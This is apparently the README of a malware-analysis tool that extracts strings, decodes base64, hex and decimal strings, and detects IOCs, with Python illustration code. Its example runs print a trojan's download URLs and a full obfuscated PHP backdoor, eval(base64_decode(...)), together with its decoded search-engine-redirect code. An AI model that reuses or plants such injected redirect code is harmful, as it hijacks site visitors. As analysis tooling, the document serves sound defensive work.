☣ Chords Malware Analyzer ☣

Chords is a malware analysis tool similar to the traditional "strings" tool, but with some advanced additions.

The tool is able to extract strings from files just like strings, but it also supports Windows wide strings, base64 and hexadecimal strings (with decoding support) and automatic recognition of Indicators of Compromise (IOCs).

It has been developed to support the malware analysis process, but it is a general purpose tool.

  • Chords: strings on steroids!

Basic features

Just like strings, sequences of ASCII characters are extracted from binary files if they are at least as long as the specified minimum length.

Unlike strings, it also extracts wide character sequences, as used by Windows binaries.
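As an added illustration of the two extraction rules above (this is example Python code written for this README, not the Common Lisp source of Chords), the following scans a byte buffer for printable ASCII runs and for Windows wide strings, which are stored as UTF-16LE with a NUL byte after every character and so are invisible to an ASCII-only scan. The sample bytes, the function names and the `break_on_newline` switch (mirroring `--nobreak`) are this example's own:

```python
from __future__ import annotations

import re


def _ascii_pattern(min_length: int, break_on_newline: bool) -> re.Pattern[bytes]:
    # Printable ASCII is 0x20-0x7e. With break_on_newline=False, tab/CR/LF may
    # appear inside a string, which is what the tool's -n / --nobreak switch does.
    cls = rb"[\x20-\x7e]" if break_on_newline else rb"[\x20-\x7e\t\r\n]"
    return re.compile(cls + rb"{%d,}" % min_length)


def extract_ascii_strings(data: bytes, min_length: int = 4, break_on_newline: bool = True) -> list[str]:
    """Runs of printable ASCII at least min_length bytes long, like strings(1)."""
    pattern = _ascii_pattern(min_length, break_on_newline)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def extract_wide_strings(data: bytes, min_length: int = 4) -> list[str]:
    """Runs of UTF-16LE characters (Windows wide strings) at least min_length characters long.

    Each printable character must be followed by a NUL byte; non-ASCII code units are
    ignored here for simplicity (an assumption of this example)."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_length)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def extract_strings(data: bytes, min_length: int = 4, break_on_newline: bool = True,
                    sort: bool = True, unique: bool = True) -> list[str]:
    """ASCII and wide strings together; sorting and de-duplication mirror the tool's defaults."""
    found = extract_ascii_strings(data, min_length, break_on_newline) + extract_wide_strings(data, min_length)
    if unique:
        found = list(dict.fromkeys(found))  # keep the first occurrence of each string
    if sort:
        found.sort()
    return found


# Constructed bytes standing in for a small Windows binary: a DOS-header fragment,
# an ASCII URL, a wide-string DLL name, a too-short run ("ab") and an ASCII PDB path.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"http://update.example.com/agent.exe\x00\x00"
    + "kernel32.dll".encode("utf-16-le") + b"\x00\x00"
    + b"\x01\x02ab\x03"
    + b"C:\\build\\agent.pdb\x00"
)

if __name__ == "__main__":
    for s in extract_strings(SAMPLE):
        print(s)
```

The double NUL after the ASCII URL is deliberate: a lone NUL between an ASCII string ending in a printable byte and a following wide string would let the scanner glue that last byte onto the wide string (here it would report "ekernel32.dll"), an artifact worth knowing when reading any strings-style output.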

Decoding

Some common encoding formats are detected and decoded:

  • Base64 strings
  • Hexadecimal encoded strings
  • Decimal encoded strings

These formats have been selected because they are commonly used by malware developers to obfuscate the behaviour of the samples.
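An added example (Python, not part of the Chords source) of how the three encodings can be recognised among extracted strings and decoded. The minimum lengths, the decimal format (comma- or space-separated byte values) and the rule that a candidate only counts if it decodes to printable text are assumptions of this example, as are the sample strings:

```python
from __future__ import annotations

import base64
import binascii
import re

# Candidate shapes. The minimum lengths are an assumption of this example (the
# real chords thresholds are not documented in this README); they limit false hits.
HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}){4,}$")        # even number of hex digits
DEC_RE = re.compile(r"^(?:\d{1,3}[,\s]+)+\d{1,3}$")      # "104,116,116,112" or "104 116 116 112"
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _as_text(raw: bytes) -> str | None:
    """Accept a decoding only if the result is text; random bytes decode to garbage."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def decode_hex(s: str) -> str | None:
    if not HEX_RE.match(s):
        return None
    return _as_text(bytes.fromhex(s))


def decode_decimal(s: str) -> str | None:
    if not DEC_RE.match(s):
        return None
    values = [int(v) for v in re.split(r"[,\s]+", s)]
    if any(v > 255 for v in values):  # e.g. "640 480" is a resolution, not encoded bytes
        return None
    return _as_text(bytes(values))


def decode_base64(s: str) -> str | None:
    if not BASE64_RE.match(s):
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    return _as_text(raw)


# Narrow shapes first: every hex string is also a syntactically valid base64 string,
# so trying base64 first would silently mis-decode hex.
DECODERS = (("hex", decode_hex), ("dec", decode_decimal), ("base64", decode_base64))


def decode_string(s: str) -> tuple[str, str] | None:
    """Return (encoding, decoded_text) for the first decoder that yields text, else None."""
    for name, fn in DECODERS:
        decoded = fn(s.strip())
        if decoded is not None:
            return name, decoded
    return None


def decode_all(strings: list[str]) -> dict[str, tuple[str, str]]:
    """Map each decodable string to its (encoding, plaintext); plain strings are skipped."""
    results = {}
    for s in strings:
        hit = decode_string(s)
        if hit:
            results[s] = hit
    return results


# Constructed sample strings for this example.
SAMPLE_STRINGS = [
    "kernel32.dll",                  # ordinary string
    "ZXJyb3JfcmVwb3J0aW5nKDApOw==",  # base64("error_reporting(0);")
    "557365722d4167656e74",          # hex("User-Agent")
    "104,116,116,112,58,47,47",      # decimal byte values of "http://"
    "640 480",                       # looks decimal-encoded, but values exceed a byte
    "12345678",                      # a plain number that happens to be valid hex
]

if __name__ == "__main__":
    for original, (encoding, text) in decode_all(SAMPLE_STRINGS).items():
        print(f"[{encoding}] {original} -> {text!r}")
```

The printable-text check is what keeps the last two sample strings out of the result: "12345678" is well-formed hex but decodes to control characters, and "640 480" has values that no byte can hold. Without such a check a decoder flags a large share of an ordinary binary's numeric strings.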

IOC extraction

To immediately extract useful information about the behaviour of a sample, the tool automatically detects the following indicators of compromise:

  • IPv4 addresses
  • DNS Domains
  • URLs
  • User-Agent strings
  • Emails
  • PDB strings

More IOCs will be supported in the future.
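Added example code (Python, not the tool's own implementation) showing one way to classify the IOC types listed above with regular expressions over already-extracted strings. The patterns, the short TLD allowlist, the precedence rule and the sample strings are all assumptions of this example:

```python
from __future__ import annotations

import re

# One regex per IOC class from the list above. These are this example's own
# patterns, kept deliberately simple; they are not the ones chords uses.
# Dictionary order is priority order: composite IOCs are matched first.
IOC_PATTERNS = {
    "url": re.compile(r"\b(?:https?|ftp)://[^\s\x22\x27<>]+", re.I),        # \x22 \x27 = " '
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
    "user_agent": re.compile(r"\bMozilla/\d\.\d \([^)]*\)[^\r\n\x22\x27]*"),
    "pdb": re.compile(r"[A-Za-z]:\\[^\r\n\x22\x27<>|*?]*?\.pdb\b", re.I),
    "ipv4": re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"),
    "domain": re.compile(r"\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}\b", re.I),
}

# Without a TLD check every "kernel32.dll" or "agent.pdb" would be reported as a
# domain. A real tool would consult the public suffix list; this short stand-in is
# an assumption of the example.
KNOWN_TLDS = {"com", "net", "org", "info", "biz", "io", "ru", "cn", "de", "uk"}

# A match of these kinds swallows whatever lies inside it: the host of a URL or the
# domain of an e-mail address is part of that IOC, not a second indicator.
COMPOSITE = ("url", "email", "user_agent", "pdb")


def extract_iocs(strings: list[str]) -> dict[str, list[str]]:
    """Classify IOCs found in the given strings; only classes with hits are returned."""
    found: dict[str, set[str]] = {kind: set() for kind in IOC_PATTERNS}
    for s in strings:
        covered: list[tuple[int, int]] = []
        for kind, pattern in IOC_PATTERNS.items():
            for m in pattern.finditer(s):
                if any(a <= m.start() and m.end() <= b for a, b in covered):
                    continue
                if kind == "domain" and m.group().rsplit(".", 1)[1].lower() not in KNOWN_TLDS:
                    continue
                if kind in COMPOSITE:
                    covered.append(m.span())
                found[kind].add(m.group())
    return {kind: sorted(hits) for kind, hits in found.items() if hits}


# Constructed strings, as if extracted from a fictitious sample.
SAMPLE_STRINGS = [
    "http://update.example.com/setup/agent_v2.exe",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "c2.example.net",
    "203.0.113.5",
    "report@example.org",
    "C:\\build\\release\\agent.pdb",
    "kernel32.dll",
    "GetProcAddress",
    "1.2.3.4",  # a four-part version string is indistinguishable from an IPv4 address
]

if __name__ == "__main__":
    print(" ====== IOCs ======")
    for kind, hits in extract_iocs(SAMPLE_STRINGS).items():
        for hit in hits:
            print(f"{kind:<10} {hit}")
```

Two properties of the output are worth keeping in mind when reading any automatic IOC list: the TLD allowlist is the only thing keeping library names such as kernel32.dll out of the domain column, and a four-part version number such as 1.2.3.4 is still reported as an IPv4 address, so the indicators are candidates to verify rather than confirmed facts about the sample.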

Usage

Chords works on binary files to extract strings and other relevant data.

See the usage of the tool:

[emanueleacri]$ chords -h
Chords - strings and wide-strings extraction utility.

Usage: chords [options] filename [filenames ...]

Available options:
  -h, --help               print this help text
  -i, --noiocs             do not search for IOCs
  -b, --base64             decode base64 strings
  -x, --hex                decode hex strings
  -d, --dec                decode decimal strings
  -l, --length NUM         minimum length for strings (default 4)
  -n, --nobreak            do not break on newlines characters
  -s, --nosort             do not sort strings
  -u, --nounique           do not remove duplicates from strings (need sorted mode)

Try running the tool against binary files or malware samples.

Compile

The tool is written in Common Lisp, and compiled with SBCL.

You need to have a working SBCL (http://www.sbcl.org/) distribution and the quicklisp (https://www.quicklisp.org/) module installed.

The source assumes that a file named quicklisp.lsp is present in your home directory.

When you have the prerequisites ready, just execute:

/usr/bin/sbcl --script chords.lsp

This produces a chords binary for your system and architecture.

If you do not want to compile the tool, you can download one of the precompiled binaries for the major operating systems and architectures.

Examples

Some analyses of common malware samples. All the malicious binaries were downloaded from public sources. Be careful!

IOCs extraction:
W32.SapinH.Trojan (hash 48a2a83f1260eacfb845b8c989eb8b0c63da63f5d26bc8d1f432f81f9a9f8da1).

[examples]$ chords 48a2a83f1260eacfb845b8c989eb8b0c63da63f5d26bc8d1f432f81f9a9f8da1

[... EXTRACTED STRINGS ...]
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.

 ====== IOCs ======

www.hao123.com
http://www.qq5.com/
http://www.go2000.com/
http://d1.kuai8.com/setup/kuai8_rjaz.exe
http://down.360safe.com/p/360Inst_oemwwq.exe
http://www.hao123.com/?tn=02023048_25_hao_pg
http://www.hao123.com/?tn=82013038_13_hao_pg
http://www.hao123.com/?tn=82013038_32_hao_pg
http://www.hao123.com/?tn=29065018_47_hao_pg
http://www.hao123.com/?tn=29065018_45_hao_pg
http://www.hao123.com/?tn=29065018_46_hao_pg
http://www.hao123.com/?tn=29065018_48_hao_pg
http://dl.client.baidu.com/union/getbdbrowser.php?tn=29065018_115.exe

String Decoding:
Custom Test PHP Backdoor (hash edd55197617ec01462906c3d9d02105703d2b291fab414585722f8995967fc99).

[chords-web]$ chords -i -b custom_test_php_backdoor.txt 
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

 ====== BASE64 ======

..error_reporting(0);..$qazplm=headers_sent();..if (!$qazplm){..$referer=$_SERVER['HTTP_REFERER'];..$uag=$_SERVER['HTTP_USER_AGENT'];..if ($uag) {..if (!stristr($uag,"MSIE 7.0")){.if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {..if (!stristr($referer,"cache") or !stristr($referer,"inurl")){..header("Location: http://gigop.americanunfinished.com/");..exit();..}.}.}..}..}

Enjoy!